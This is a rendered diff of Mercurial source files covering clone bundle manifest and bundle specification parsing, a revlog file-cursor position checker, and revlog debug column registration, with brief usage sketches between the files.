16 | 18 | |
|
17 | 19 | from .thirdparty import attr |
|
18 | 20 | |
|
19 | 21 | # Force pytype to use the non-vendored package |
|
20 | 22 | if typing.TYPE_CHECKING: |
|
21 | 23 | # noinspection PyPackageRequirements |
|
22 | 24 | import attr |
|
23 | 25 | |
|
24 | 26 | from . import ( |
|
25 | 27 | error, |
|
26 | 28 | requirements as requirementsmod, |
|
27 | 29 | sslutil, |
|
28 | 30 | util, |
|
29 | 31 | ) |
|
30 | 32 | from .utils import stringutil |
|
31 | 33 | |
|
32 | 34 | urlreq = util.urlreq |
|
33 | 35 | |
|
34 | 36 | BUNDLE_CACHE_DIR = b'bundle-cache' |
|
35 | 37 | CB_MANIFEST_FILE = b'clonebundles.manifest' |
|
36 | 38 | CLONEBUNDLESCHEME = b"peer-bundle-cache://" |
|
37 | 39 | |
|
38 | 40 | |
|
39 | 41 | def get_manifest(repo) -> bytes: |
|
40 | 42 | """get the bundle manifest to be served to a client from a server""" |
|
41 | 43 | raw_text = repo.vfs.tryread(CB_MANIFEST_FILE) |
|
42 | 44 | entries = [e.split(b' ', 1) for e in raw_text.splitlines()] |
|
43 | 45 | |
|
44 | 46 | new_lines = [] |
|
45 | 47 | for e in entries: |
|
46 | 48 | url = alter_bundle_url(repo, e[0]) |
|
47 | 49 | if len(e) == 1: |
|
48 | 50 | line = url + b'\n' |
|
49 | 51 | else: |
|
50 | 52 | line = b"%s %s\n" % (url, e[1]) |
|
51 | 53 | new_lines.append(line) |
|
52 | 54 | return b''.join(new_lines) |
|
53 | 55 | |
|
54 | 56 | |
|
55 | 57 | def alter_bundle_url(repo, url: bytes) -> bytes: |
|
56 | 58 | """a function that exist to help extension and hosting to alter the url |
|
57 | 59 | |
|
58 | 60 | This will typically be used to inject authentication information in the url |
|
59 | 61 | of cached bundles.""" |
|
60 | 62 | return url |
|
61 | 63 | |
|
62 | 64 | |
|
63 | 65 | SUPPORTED_CLONEBUNDLE_SCHEMES = [ |
|
64 | 66 | b"http://", |
|
65 | 67 | b"https://", |
|
66 | 68 | b"largefile://", |
|
67 | 69 | CLONEBUNDLESCHEME, |
|
68 | 70 | ] |
|
69 | 71 | |
|
70 | 72 | |
|
71 | 73 | @attr.s |
|
72 | 74 | class bundlespec: |
|
73 | 75 | compression = attr.ib() |
|
74 | 76 | wirecompression = attr.ib() |
|
75 | 77 | version = attr.ib() |
|
76 | 78 | wireversion = attr.ib() |
|
77 | 79 | # parameters explicitly overwritten by the config or the specification |
|
78 | 80 | _explicit_params = attr.ib() |
|
79 | 81 | # default parameter for the version |
|
80 | 82 | # |
|
81 | 83 | # Keeping it separated is useful to check what was actually overwritten. |
|
82 | 84 | _default_opts = attr.ib() |
|
83 | 85 | |
|
84 | 86 | @property |
|
85 | 87 | def params(self): |
|
86 | 88 | return collections.ChainMap(self._explicit_params, self._default_opts) |
|
87 | 89 | |
|
88 | 90 | @property |
|
89 | 91 | def contentopts(self): |
|
90 | 92 | # kept for Backward Compatibility concerns. |
|
91 | 93 | return self.params |
|
92 | 94 | |
|
93 | 95 | def set_param(self, key, value, overwrite=True): |
|
94 | 96 | """Set a bundle parameter value. |
|
95 | 97 | |
|
96 | 98 | Will only overwrite if overwrite is true""" |
|
97 | 99 | if overwrite or key not in self._explicit_params: |
|
98 | 100 | self._explicit_params[key] = value |
|
99 | 101 | |
|
100 | 102 | def as_spec(self): |
|
101 | 103 | parts = [b"%s-%s" % (self.compression, self.version)] |
|
102 | 104 | for param in sorted(self._explicit_params.items()): |
|
103 | 105 | parts.append(b'%s=%s' % param) |
|
104 | 106 | return b';'.join(parts) |
|
105 | 107 | |
|
106 | 108 | |
|
107 | 109 | # Maps bundle version human names to changegroup versions. |
|
108 | 110 | _bundlespeccgversions = { |
|
109 | 111 | b'v1': b'01', |
|
110 | 112 | b'v2': b'02', |
|
111 | 113 | b'v3': b'03', |
|
112 | 114 | b'packed1': b's1', |
|
113 | 115 | b'bundle2': b'02', # legacy |
|
114 | 116 | } |
|
115 | 117 | |
|
116 | 118 | # Maps bundle version with content opts to choose which part to bundle |
|
117 | 119 | _bundlespeccontentopts: Dict[bytes, Dict[bytes, Union[bool, bytes]]] = { |
|
118 | 120 | b'v1': { |
|
119 | 121 | b'changegroup': True, |
|
120 | 122 | b'cg.version': b'01', |
|
121 | 123 | b'obsolescence': False, |
|
122 | 124 | b'phases': False, |
|
123 | 125 | b'tagsfnodescache': False, |
|
124 | 126 | b'revbranchcache': False, |
|
125 | 127 | }, |
|
126 | 128 | b'v2': { |
|
127 | 129 | b'changegroup': True, |
|
128 | 130 | b'cg.version': b'02', |
|
129 | 131 | b'obsolescence': False, |
|
130 | 132 | b'phases': False, |
|
131 | 133 | b'tagsfnodescache': True, |
|
132 | 134 | b'revbranchcache': True, |
|
133 | 135 | }, |
|
134 | 136 | b'v3': { |
|
135 | 137 | b'changegroup': True, |
|
136 | 138 | b'cg.version': b'03', |
|
137 | 139 | b'obsolescence': False, |
|
138 | 140 | b'phases': True, |
|
139 | 141 | b'tagsfnodescache': True, |
|
140 | 142 | b'revbranchcache': True, |
|
141 | 143 | }, |
|
142 | 144 | b'streamv2': { |
|
143 | 145 | b'changegroup': False, |
|
144 | 146 | b'cg.version': b'02', |
|
145 | 147 | b'obsolescence': False, |
|
146 | 148 | b'phases': False, |
|
147 | 149 | b"stream": b"v2", |
|
148 | 150 | b'tagsfnodescache': False, |
|
149 | 151 | b'revbranchcache': False, |
|
150 | 152 | }, |
|
151 | 153 | b'streamv3-exp': { |
|
152 | 154 | b'changegroup': False, |
|
153 | 155 | b'cg.version': b'03', |
|
154 | 156 | b'obsolescence': False, |
|
155 | 157 | b'phases': False, |
|
156 | 158 | b"stream": b"v3-exp", |
|
157 | 159 | b'tagsfnodescache': False, |
|
158 | 160 | b'revbranchcache': False, |
|
159 | 161 | }, |
|
160 | 162 | b'packed1': { |
|
161 | 163 | b'cg.version': b's1', |
|
162 | 164 | }, |
|
163 | 165 | b'bundle2': { # legacy |
|
164 | 166 | b'cg.version': b'02', |
|
165 | 167 | }, |
|
166 | 168 | } |
|
167 | 169 | _bundlespeccontentopts[b'bundle2'] = _bundlespeccontentopts[b'v2'] |
|
168 | 170 | |
|
169 | 171 | # Compression engines allowed in version 1. THIS SHOULD NEVER CHANGE. |
|
170 | 172 | _bundlespecv1compengines = {b'gzip', b'bzip2', b'none'} |
|
171 | 173 | |
|
172 | 174 | |
|
173 | 175 | def param_bool(key, value): |
|
174 | 176 | """make a boolean out of a parameter value""" |
|
175 | 177 | b = stringutil.parsebool(value) |
|
176 | 178 | if b is None: |
|
177 | 179 | msg = _(b"parameter %s should be a boolean ('%s')") |
|
178 | 180 | msg %= (key, value) |
|
179 | 181 | raise error.InvalidBundleSpecification(msg) |
|
180 | 182 | return b |
|
181 | 183 | |
|
182 | 184 | |
|
183 | 185 | # mapping of known parameter names that need their value processed |
|
184 | 186 | bundle_spec_param_processing = { |
|
185 | 187 | b"obsolescence": param_bool, |
|
186 | 188 | b"obsolescence-mandatory": param_bool, |
|
187 | 189 | b"phases": param_bool, |
|
188 | 190 | b"changegroup": param_bool, |
|
189 | 191 | b"tagsfnodescache": param_bool, |
|
190 | 192 | b"revbranchcache": param_bool, |
|
191 | 193 | } |
|
192 | 194 | |
|
193 | 195 | |
|
194 | 196 | def _parseparams(s): |
|
195 | 197 | """parse bundlespec parameter section |
|
196 | 198 | |
|
197 | 199 | input: "comp-version;params" string |
|
198 | 200 | |
|
199 | 201 | return: (spec, {param_key: param_value}) |
|
200 | 202 | """ |
|
201 | 203 | if b';' not in s: |
|
202 | 204 | return s, {} |
|
203 | 205 | |
|
204 | 206 | params = {} |
|
205 | 207 | version, paramstr = s.split(b';', 1) |
|
206 | 208 | |
|
207 | 209 | err = _(b'invalid bundle specification: missing "=" in parameter: %s') |
|
208 | 210 | for p in paramstr.split(b';'): |
|
209 | 211 | if b'=' not in p: |
|
210 | 212 | msg = err % p |
|
211 | 213 | raise error.InvalidBundleSpecification(msg) |
|
212 | 214 | |
|
213 | 215 | key, value = p.split(b'=', 1) |
|
214 | 216 | key = urlreq.unquote(key) |
|
215 | 217 | value = urlreq.unquote(value) |
|
216 | 218 | process = bundle_spec_param_processing.get(key) |
|
217 | 219 | if process is not None: |
|
218 | 220 | value = process(key, value) |
|
219 | 221 | params[key] = value |
|
220 | 222 | |
|
221 | 223 | return version, params |
|
222 | 224 | |
|
223 | 225 | |
|
224 | 226 | def parsebundlespec(repo, spec, strict=True): |
|
225 | 227 | """Parse a bundle string specification into parts. |
|
226 | 228 | |
|
227 | 229 | Bundle specifications denote a well-defined bundle/exchange format. |
|
228 | 230 | The content of a given specification should not change over time in |
|
229 | 231 | order to ensure that bundles produced by a newer version of Mercurial are |
|
230 | 232 | readable from an older version. |
|
231 | 233 | |
|
232 | 234 | The string currently has the form: |
|
233 | 235 | |
|
234 | 236 | <compression>-<type>[;<parameter0>[;<parameter1>]] |
|
235 | 237 | |
|
236 | 238 | Where <compression> is one of the supported compression formats |
|
237 | 239 | and <type> is (currently) a version string. A ";" can follow the type and |
|
238 | 240 | all text afterwards is interpreted as URI encoded, ";" delimited key=value |
|
239 | 241 | pairs. |
|
240 | 242 | |
|
241 | 243 | If ``strict`` is True (the default) <compression> is required. Otherwise, |
|
242 | 244 | it is optional. |
|
243 | 245 | |
|
244 | 246 | Returns a bundlespec object of (compression, version, parameters). |
|
245 | 247 | Compression will be ``None`` if not in strict mode and a compression isn't |
|
246 | 248 | defined. |
|
247 | 249 | |
|
248 | 250 | An ``InvalidBundleSpecification`` is raised when the specification is |
|
249 | 251 | not syntactically well formed. |
|
250 | 252 | |
|
251 | 253 | An ``UnsupportedBundleSpecification`` is raised when the compression or |
|
252 | 254 | bundle type/version is not recognized. |
|
253 | 255 | |
|
254 | 256 | Note: this function will likely eventually return a more complex data |
|
255 | 257 | structure, including bundle2 part information. |
|
256 | 258 | """ |
|
257 | 259 | if strict and b'-' not in spec: |
|
258 | 260 | raise error.InvalidBundleSpecification( |
|
259 | 261 | _( |
|
260 | 262 | b'invalid bundle specification; ' |
|
261 | 263 | b'must be prefixed with compression: %s' |
|
262 | 264 | ) |
|
263 | 265 | % spec |
|
264 | 266 | ) |
|
265 | 267 | |
|
266 | 268 | pre_args = spec.split(b';', 1)[0] |
|
267 | 269 | if b'-' in pre_args: |
|
268 | 270 | compression, version = spec.split(b'-', 1) |
|
269 | 271 | |
|
270 | 272 | if compression not in util.compengines.supportedbundlenames: |
|
271 | 273 | raise error.UnsupportedBundleSpecification( |
|
272 | 274 | _(b'%s compression is not supported') % compression |
|
273 | 275 | ) |
|
274 | 276 | |
|
275 | 277 | version, params = _parseparams(version) |
|
276 | 278 | |
|
277 | 279 | if version not in _bundlespeccontentopts: |
|
278 | 280 | raise error.UnsupportedBundleSpecification( |
|
279 | 281 | _(b'%s is not a recognized bundle version') % version |
|
280 | 282 | ) |
|
281 | 283 | else: |
|
282 | 284 | # Value could be just the compression or just the version, in which |
|
283 | 285 | # case some defaults are assumed (but only when not in strict mode). |
|
284 | 286 | assert not strict |
|
285 | 287 | |
|
286 | 288 | spec, params = _parseparams(spec) |
|
287 | 289 | |
|
288 | 290 | if spec in util.compengines.supportedbundlenames: |
|
289 | 291 | compression = spec |
|
290 | 292 | version = b'v1' |
|
291 | 293 | # Generaldelta repos require v2. |
|
292 | 294 | if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: |
|
293 | 295 | version = b'v2' |
|
294 | 296 | elif requirementsmod.REVLOGV2_REQUIREMENT in repo.requirements: |
|
295 | 297 | version = b'v2' |
|
296 | 298 | # Modern compression engines require v2. |
|
297 | 299 | if compression not in _bundlespecv1compengines: |
|
298 | 300 | version = b'v2' |
|
299 | 301 | elif spec in _bundlespeccontentopts: |
|
300 | 302 | if spec == b'packed1': |
|
301 | 303 | compression = b'none' |
|
302 | 304 | else: |
|
303 | 305 | compression = b'bzip2' |
|
304 | 306 | version = spec |
|
305 | 307 | else: |
|
306 | 308 | raise error.UnsupportedBundleSpecification( |
|
307 | 309 | _(b'%s is not a recognized bundle specification') % spec |
|
308 | 310 | ) |
|
309 | 311 | |
|
310 | 312 | # Bundle version 1 only supports a known set of compression engines. |
|
311 | 313 | if version == b'v1' and compression not in _bundlespecv1compengines: |
|
312 | 314 | raise error.UnsupportedBundleSpecification( |
|
313 | 315 | _(b'compression engine %s is not supported on v1 bundles') |
|
314 | 316 | % compression |
|
315 | 317 | ) |
|
316 | 318 | |
|
317 | 319 | # The specification for packed1 can optionally declare the data formats |
|
318 | 320 | # required to apply it. If we see this metadata, compare against what the |
|
319 | 321 | # repo supports and error if the bundle isn't compatible. |
|
320 | 322 | if version == b'packed1' and b'requirements' in params: |
|
321 | 323 | requirements = set(cast(bytes, params[b'requirements']).split(b',')) |
|
322 | 324 | missingreqs = requirements - requirementsmod.STREAM_FIXED_REQUIREMENTS |
|
323 | 325 | if missingreqs: |
|
324 | 326 | raise error.UnsupportedBundleSpecification( |
|
325 | 327 | _(b'missing support for repository features: %s') |
|
326 | 328 | % b', '.join(sorted(missingreqs)) |
|
327 | 329 | ) |
|
328 | 330 | |
|
329 | 331 | # Compute contentopts based on the version |
|
330 | 332 | if b"stream" in params: |
|
331 | 333 | # This case is fishy as this mostly derails the version selection |
|
332 | 334 | # mechanism. `stream` bundles are quite specific and used differently |
|
333 | 335 | # from "normal" bundles. |
|
334 | 336 | # |
|
335 | 337 | # (we should probably define a cleaner way to do this and raise a |
|
336 | 338 | # warning when the old way is encountered) |
|
337 | 339 | if params[b"stream"] == b"v2": |
|
338 | 340 | version = b"streamv2" |
|
339 | 341 | if params[b"stream"] == b"v3-exp": |
|
340 | 342 | version = b"streamv3-exp" |
|
341 | 343 | contentopts = _bundlespeccontentopts.get(version, {}).copy() |
|
342 | 344 | if version == b"streamv2" or version == b"streamv3-exp": |
|
343 | 345 | # streamv2 has been reported as "v2" for a while. |
|
344 | 346 | version = b"v2" |
|
345 | 347 | |
|
346 | 348 | engine = util.compengines.forbundlename(compression) |
|
347 | 349 | compression, wirecompression = engine.bundletype() |
|
348 | 350 | wireversion = _bundlespeccontentopts[version][b'cg.version'] |
|
349 | 351 | |
|
350 | 352 | return bundlespec( |
|
351 | 353 | compression, wirecompression, version, wireversion, params, contentopts |
|
352 | 354 | ) |
|
353 | 355 | |
|
354 | 356 | |
|
355 | 357 | def parseclonebundlesmanifest(repo, s): |
|
356 | 358 | """Parses the raw text of a clone bundles manifest. |
|
357 | 359 | |
|
358 | 360 | Returns a list of dicts. The dicts have a ``URL`` key corresponding |
|
359 | 361 | to the URL and other keys are the attributes for the entry. |
|
360 | 362 | """ |
|
361 | 363 | m = [] |
|
362 | 364 | for line in s.splitlines(): |
|
363 | 365 | fields = line.split() |
|
364 | 366 | if not fields: |
|
365 | 367 | continue |
|
366 | 368 | attrs = {b'URL': fields[0]} |
|
367 | 369 | for rawattr in fields[1:]: |
|
368 | 370 | key, value = rawattr.split(b'=', 1) |
|
369 | 371 | key = util.urlreq.unquote(key) |
|
370 | 372 | value = util.urlreq.unquote(value) |
|
371 | 373 | attrs[key] = value |
|
372 | 374 | |
|
373 | 375 | # Parse BUNDLESPEC into components. This makes client-side |
|
374 | 376 | # preferences easier to specify since you can prefer a single |
|
375 | 377 | # component of the BUNDLESPEC. |
|
376 | 378 | if key == b'BUNDLESPEC': |
|
377 | 379 | try: |
|
378 | 380 | bundlespec = parsebundlespec(repo, value) |
|
379 | 381 | attrs[b'COMPRESSION'] = bundlespec.compression |
|
380 | 382 | attrs[b'VERSION'] = bundlespec.version |
|
381 | 383 | except error.InvalidBundleSpecification: |
|
382 | 384 | pass |
|
383 | 385 | except error.UnsupportedBundleSpecification: |
|
384 | 386 | pass |
|
385 | 387 | |
|
386 | 388 | m.append(attrs) |
|
387 | 389 | |
|
388 | 390 | return m |
|
389 | 391 | |
|
390 | 392 | |
|
391 | 393 | def isstreamclonespec(bundlespec): |
|
392 | 394 | # Stream clone v1 |
|
393 | 395 | if bundlespec.wirecompression == b'UN' and bundlespec.wireversion == b's1': |
|
394 | 396 | return True |
|
395 | 397 | |
|
396 | 398 | # Stream clone v2 |
|
397 | 399 | if ( |
|
398 | 400 | bundlespec.wirecompression == b'UN' |
|
399 | 401 | and bundlespec.wireversion == b'02' |
|
400 | 402 | and bundlespec.contentopts.get(b'stream', None) in (b"v2", b"v3-exp") |
|
401 | 403 | ): |
|
402 | 404 | return True |
|
403 | 405 | |
|
404 | 406 | return False |
|
405 | 407 | |
|
406 | 408 | |
|
407 | 409 | def filterclonebundleentries( |
|
408 | 410 | repo, entries, streamclonerequested=False, pullbundles=False |
|
409 | 411 | ): |
|
410 | 412 | """Remove incompatible clone bundle manifest entries. |
|
411 | 413 | |
|
412 | 414 | Accepts a list of entries parsed with ``parseclonebundlesmanifest`` |
|
413 | 415 | and returns a new list consisting of only the entries that this client |
|
414 | 416 | should be able to apply. |
|
415 | 417 | |
|
416 | 418 | There is no guarantee we'll be able to apply all returned entries because |
|
417 | 419 | the metadata we use to filter on may be missing or wrong. |
|
418 | 420 | """ |
|
419 | 421 | newentries = [] |
|
420 | 422 | for entry in entries: |
|
421 | 423 | url = entry.get(b'URL') |
|
422 | 424 | if not pullbundles and not any( |
|
423 | 425 | [url.startswith(scheme) for scheme in SUPPORTED_CLONEBUNDLE_SCHEMES] |
|
424 | 426 | ): |
|
425 | 427 | repo.ui.debug( |
|
426 | 428 | b'filtering %s because not a supported clonebundle scheme\n' |
|
427 | 429 | % url |
|
428 | 430 | ) |
|
429 | 431 | continue |
|
430 | 432 | |
|
431 | 433 | spec = entry.get(b'BUNDLESPEC') |
|
432 | 434 | if spec: |
|
433 | 435 | try: |
|
434 | 436 | bundlespec = parsebundlespec(repo, spec, strict=True) |
|
435 | 437 | |
|
436 | 438 | # If a stream clone was requested, filter out non-streamclone |
|
437 | 439 | # entries. |
|
438 | 440 | if streamclonerequested and not isstreamclonespec(bundlespec): |
|
439 | 441 | repo.ui.debug( |
|
440 | 442 | b'filtering %s because not a stream clone\n' % url |
|
441 | 443 | ) |
|
442 | 444 | continue |
|
443 | 445 | |
|
444 | 446 | except error.InvalidBundleSpecification as e: |
|
445 | 447 | repo.ui.debug(stringutil.forcebytestr(e) + b'\n') |
|
446 | 448 | continue |
|
447 | 449 | except error.UnsupportedBundleSpecification as e: |
|
448 | 450 | repo.ui.debug( |
|
449 | 451 | b'filtering %s because unsupported bundle ' |
|
450 | 452 | b'spec: %s\n' % (url, stringutil.forcebytestr(e)) |
|
451 | 453 | ) |
|
452 | 454 | continue |
|
453 | 455 | # If we don't have a spec and requested a stream clone, we don't know |
|
454 | 456 | # what the entry is so don't attempt to apply it. |
|
455 | 457 | elif streamclonerequested: |
|
456 | 458 | repo.ui.debug( |
|
457 | 459 | b'filtering %s because cannot determine if a stream ' |
|
458 | 460 | b'clone bundle\n' % url |
|
459 | 461 | ) |
|
460 | 462 | continue |
|
461 | 463 | |
|
462 | 464 | if b'REQUIRESNI' in entry and not sslutil.hassni: |
|
463 | 465 | repo.ui.debug(b'filtering %s because SNI not supported\n' % url) |
|
464 | 466 | continue |
|
465 | 467 | |
|
466 | 468 | if b'REQUIREDRAM' in entry: |
|
467 | 469 | try: |
|
468 | 470 | requiredram = util.sizetoint(entry[b'REQUIREDRAM']) |
|
469 | 471 | except error.ParseError: |
|
470 | 472 | repo.ui.debug( |
|
471 | 473 | b'filtering %s due to a bad REQUIREDRAM attribute\n' % url |
|
472 | 474 | ) |
|
473 | 475 | continue |
|
474 | 476 | actualram = repo.ui.estimatememory() |
|
475 | 477 | if actualram is not None and actualram * 0.66 < requiredram: |
|
476 | 478 | repo.ui.debug( |
|
477 | 479 | b'filtering %s as it needs more than 2/3 of system memory\n' |
|
478 | 480 | % url |
|
479 | 481 | ) |
|
480 | 482 | continue |
|
481 | 483 | |
|
482 | 484 | newentries.append(entry) |
|
483 | 485 | |
|
484 | 486 | return newentries |
|
485 | 487 | |
|
486 | 488 | |
|
487 | 489 | class clonebundleentry: |
|
488 | 490 | """Represents an item in a clone bundles manifest. |
|
489 | 491 | |
|
490 | 492 | This rich class is needed to support sorting since sorted() in Python 3 |
|
491 | 493 | doesn't support ``cmp`` and our comparison is complex enough that ``key=`` |
|
492 | 494 | won't work. |
|
493 | 495 | """ |
|
494 | 496 | |
|
495 | 497 | def __init__(self, value, prefers): |
|
496 | 498 | self.value = value |
|
497 | 499 | self.prefers = prefers |
|
498 | 500 | |
|
499 | 501 | def _cmp(self, other): |
|
500 | 502 | for prefkey, prefvalue in self.prefers: |
|
501 | 503 | avalue = self.value.get(prefkey) |
|
502 | 504 | bvalue = other.value.get(prefkey) |
|
503 | 505 | |
|
504 | 506 | # Special case for b missing attribute and a matches exactly. |
|
505 | 507 | if avalue is not None and bvalue is None and avalue == prefvalue: |
|
506 | 508 | return -1 |
|
507 | 509 | |
|
508 | 510 | # Special case for a missing attribute and b matches exactly. |
|
509 | 511 | if bvalue is not None and avalue is None and bvalue == prefvalue: |
|
510 | 512 | return 1 |
|
511 | 513 | |
|
512 | 514 | # We can't compare unless attribute present on both. |
|
513 | 515 | if avalue is None or bvalue is None: |
|
514 | 516 | continue |
|
515 | 517 | |
|
516 | 518 | # Same values should fall back to next attribute. |
|
517 | 519 | if avalue == bvalue: |
|
518 | 520 | continue |
|
519 | 521 | |
|
520 | 522 | # Exact matches come first. |
|
521 | 523 | if avalue == prefvalue: |
|
522 | 524 | return -1 |
|
523 | 525 | if bvalue == prefvalue: |
|
524 | 526 | return 1 |
|
525 | 527 | |
|
526 | 528 | # Fall back to next attribute. |
|
527 | 529 | continue |
|
528 | 530 | |
|
529 | 531 | # If we got here we couldn't sort by attributes and prefers. Fall |
|
530 | 532 | # back to index order. |
|
531 | 533 | return 0 |
|
532 | 534 | |
|
533 | 535 | def __lt__(self, other): |
|
534 | 536 | return self._cmp(other) < 0 |
|
535 | 537 | |
|
536 | 538 | def __gt__(self, other): |
|
537 | 539 | return self._cmp(other) > 0 |
|
538 | 540 | |
|
539 | 541 | def __eq__(self, other): |
|
540 | 542 | return self._cmp(other) == 0 |
|
541 | 543 | |
|
542 | 544 | def __le__(self, other): |
|
543 | 545 | return self._cmp(other) <= 0 |
|
544 | 546 | |
|
545 | 547 | def __ge__(self, other): |
|
546 | 548 | return self._cmp(other) >= 0 |
|
547 | 549 | |
|
548 | 550 | def __ne__(self, other): |
|
549 | 551 | return self._cmp(other) != 0 |
|
550 | 552 | |
|
551 | 553 | |
|
552 | 554 | def sortclonebundleentries(ui, entries): |
|
553 | 555 | prefers = ui.configlist(b'ui', b'clonebundleprefers') |
|
554 | 556 | if not prefers: |
|
555 | 557 | return list(entries) |
|
556 | 558 | |
|
557 | 559 | def _split(p): |
|
558 | 560 | if b'=' not in p: |
|
559 | 561 | hint = _(b"each comma separated item should be key=value pairs") |
|
560 | 562 | raise error.Abort( |
|
561 | 563 | _(b"invalid ui.clonebundleprefers item: %s") % p, hint=hint |
|
562 | 564 | ) |
|
563 | 565 | return p.split(b'=', 1) |
|
564 | 566 | |
|
565 | 567 | prefers = [_split(p) for p in prefers] |
|
566 | 568 | |
|
567 | 569 | items = sorted(clonebundleentry(v, prefers) for v in entries) |
|
568 | 570 | return [i.value for i in items] |
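To make the bundle specification grammar described in parsebundlespec() concrete, a worked sketch of how one spec string decomposes; the repo object is assumed, and the expected values follow the parsing and param_bool() logic above.

    # '<compression>-<version>;<key>=<value>' form from the docstring.
    spec = b'zstd-v2;obsolescence=yes'
    bs = parsebundlespec(repo, spec)
    # bs.compression              -> b'zstd'
    # bs.version                  -> b'v2'
    # bs.params[b'obsolescence']  -> True   (parsed by param_bool)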
@@ -1,38 +1,40 | |||
|
1 | from __future__ import annotations | |
|
2 | ||
|
1 | 3 | from ..i18n import _ |
|
2 | 4 | from .. import error |
|
3 | 5 | |
|
4 | 6 | |
|
5 | 7 | def get_checker(ui, revlog_name=b'changelog'): |
|
6 | 8 | """Get a function that checks file handle position is as expected. |
|
7 | 9 | |
|
8 | 10 | This is used to ensure that files haven't been modified outside of our |
|
9 | 11 | knowledge (such as on a networked filesystem, if `hg debuglocks` was used, |
|
10 | 12 | or writes to .hg that ignored locks happened). |
|
11 | 13 | |
|
12 | 14 | Due to revlogs supporting a concept of buffered, delayed, or diverted |
|
13 | 15 | writes, we're allowing the files to be shorter than expected (the data may |
|
14 | 16 | not have been written yet), but they can't be longer. |
|
15 | 17 | |
|
16 | 18 | Please note that this check is not perfect; it can't detect all cases (there |
|
17 | 19 | may be false-negatives/false-OKs), but it should never claim there's an |
|
18 | 20 | issue when there isn't (false-positives/false-failures). |
|
19 | 21 | """ |
|
20 | 22 | |
|
21 | 23 | vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name) |
|
22 | 24 | # Avoid any `fh.tell` cost if this isn't enabled. |
|
23 | 25 | if not vpos or vpos not in [b'log', b'warn', b'fail']: |
|
24 | 26 | return None |
|
25 | 27 | |
|
26 | 28 | def _checker(fh, fn, expected): |
|
27 | 29 | if fh.tell() <= expected: |
|
28 | 30 | return |
|
29 | 31 | |
|
30 | 32 | msg = _(b'%s: file cursor at position %d, expected %d') |
|
31 | 33 | # Always log if we're going to warn or fail. |
|
32 | 34 | ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) |
|
33 | 35 | if vpos == b'warn': |
|
34 | 36 | ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) |
|
35 | 37 | elif vpos == b'fail': |
|
36 | 38 | raise error.RevlogError(msg % (fn, fh.tell(), expected)) |
|
37 | 39 | |
|
38 | 40 | return _checker |
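A brief usage sketch of the checker above. The configuration key matches what get_checker() reads (`debug.revlog.verifyposition.<name>`); the file handle, file name, and expected offset are hypothetical placeholders supplied by the caller.

    # With, for example, the following in the user's configuration:
    #   [debug]
    #   revlog.verifyposition.changelog = warn
    checker = get_checker(ui, revlog_name=b'changelog')
    if checker is not None:
        # fh: open revlog file object; expected_offset: where the revlog
        # believes the cursor should be (both assumed here).
        checker(fh, b'00changelog.i', expected_offset)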
@@ -1,943 +1,945 | |||
|
1 | 1 | # revlogutils/debug.py - utility used for revlog debugging |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> |
|
4 | 4 | # Copyright 2022 Octobus <contact@octobus.net> |
|
5 | 5 | # |
|
6 | 6 | # This software may be used and distributed according to the terms of the |
|
7 | 7 | # GNU General Public License version 2 or any later version. |
|
8 | 8 | |
|
9 | from __future__ import annotations | |
|
10 | ||
|
9 | 11 | import collections |
|
10 | 12 | import string |
|
11 | 13 | |
|
12 | 14 | from .. import ( |
|
13 | 15 | mdiff, |
|
14 | 16 | node as nodemod, |
|
15 | 17 | revlogutils, |
|
16 | 18 | ) |
|
17 | 19 | |
|
18 | 20 | from . import ( |
|
19 | 21 | constants, |
|
20 | 22 | deltas as deltautil, |
|
21 | 23 | ) |
|
22 | 24 | |
|
23 | 25 | INDEX_ENTRY_DEBUG_COLUMN = [] |
|
24 | 26 | |
|
25 | 27 | NODE_SIZE = object() |
|
26 | 28 | |
|
27 | 29 | |
|
28 | 30 | class _column_base: |
|
29 | 31 | """constains the definition of a revlog column |
|
30 | 32 | |
|
31 | 33 | name: the column header, |
|
32 | 34 | value_func: the function called to get a value, |
|
33 | 35 | size: the width of the column, |
|
34 | 36 | verbose_only: only include the column in verbose mode. |
|
35 | 37 | """ |
|
36 | 38 | |
|
37 | 39 | def __init__(self, name, value_func, size=None, verbose=False): |
|
38 | 40 | self.name = name |
|
39 | 41 | self.value_func = value_func |
|
40 | 42 | if size is not NODE_SIZE: |
|
41 | 43 | if size is None: |
|
42 | 44 | size = 8 # arbitrary default |
|
43 | 45 | size = max(len(name), size) |
|
44 | 46 | self._size = size |
|
45 | 47 | self.verbose_only = verbose |
|
46 | 48 | |
|
47 | 49 | def get_size(self, node_size): |
|
48 | 50 | if self._size is NODE_SIZE: |
|
49 | 51 | return node_size |
|
50 | 52 | else: |
|
51 | 53 | return self._size |
|
52 | 54 | |
|
53 | 55 | |
|
54 | 56 | def debug_column(name, size=None, verbose=False): |
|
55 | 57 | """decorated function is registered as a column |
|
56 | 58 | |
|
57 | 59 | name: the name of the column, |
|
58 | 60 | size: the expected size of the column. |
|
59 | 61 | """ |
|
60 | 62 | |
|
61 | 63 | def register(func): |
|
62 | 64 | entry = _column_base( |
|
63 | 65 | name=name, |
|
64 | 66 | value_func=func, |
|
65 | 67 | size=size, |
|
66 | 68 | verbose=verbose, |
|
67 | 69 | ) |
|
68 | 70 | INDEX_ENTRY_DEBUG_COLUMN.append(entry) |
|
69 | 71 | return entry |
|
70 | 72 | |
|
71 | 73 | return register |
|
72 | 74 | |
|
73 | 75 | |
|
74 | 76 | @debug_column(b"rev", size=6) |
|
75 | 77 | def _rev(index, rev, entry, hexfn): |
|
76 | 78 | return b"%d" % rev |
|
77 | 79 | |
|
78 | 80 | |
|
79 | 81 | @debug_column(b"rank", size=6, verbose=True) |
|
80 | 82 | def rank(index, rev, entry, hexfn): |
|
81 | 83 | return b"%d" % entry[constants.ENTRY_RANK] |
|
82 | 84 | |
|
83 | 85 | |
|
84 | 86 | @debug_column(b"linkrev", size=6) |
|
85 | 87 | def _linkrev(index, rev, entry, hexfn): |
|
86 | 88 | return b"%d" % entry[constants.ENTRY_LINK_REV] |
|
87 | 89 | |
|
88 | 90 | |
|
89 | 91 | @debug_column(b"nodeid", size=NODE_SIZE) |
|
90 | 92 | def _nodeid(index, rev, entry, hexfn): |
|
91 | 93 | return hexfn(entry[constants.ENTRY_NODE_ID]) |
|
92 | 94 | |
|
93 | 95 | |
|
94 | 96 | @debug_column(b"p1-rev", size=6, verbose=True) |
|
